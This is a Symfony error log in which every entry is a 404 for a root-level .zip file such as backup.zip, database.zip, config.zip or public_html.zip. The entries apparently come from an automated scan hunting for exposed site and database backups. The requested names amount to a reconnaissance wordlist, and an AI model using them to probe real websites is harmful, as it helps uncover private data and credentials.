[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /upload.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /upload.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /database.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /database.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-complete.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-complete.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /inetpub.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /inetpub.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_weekly.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_weekly.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /images.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /images.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /www.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /www.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /apps.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /apps.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /clients.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /clients.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public_html.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public_html.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /rest.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /rest.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /run.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /run.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /exceptions.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /exceptions.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /media.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /media.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /kernel.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /kernel.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /export.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /export.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /typo3.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /typo3.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /php.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /php.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /express.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /express.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telegram.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telegram.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /youtube.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /youtube.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ionic.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ionic.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /splunk.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /splunk.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /facebook.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /facebook.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sync.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sync.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /native.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /native.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /bugsnag.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /bugsnag.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mobile.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mobile.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /datadog.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /datadog.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mega.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mega.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /general.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /general.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /common.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /common.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /slack.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /slack.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /example.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /example.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /miscellaneous.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /miscellaneous.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /pinterest.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /pinterest.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /pcloud.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /pcloud.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /xamarin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /xamarin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /discord.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /discord.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
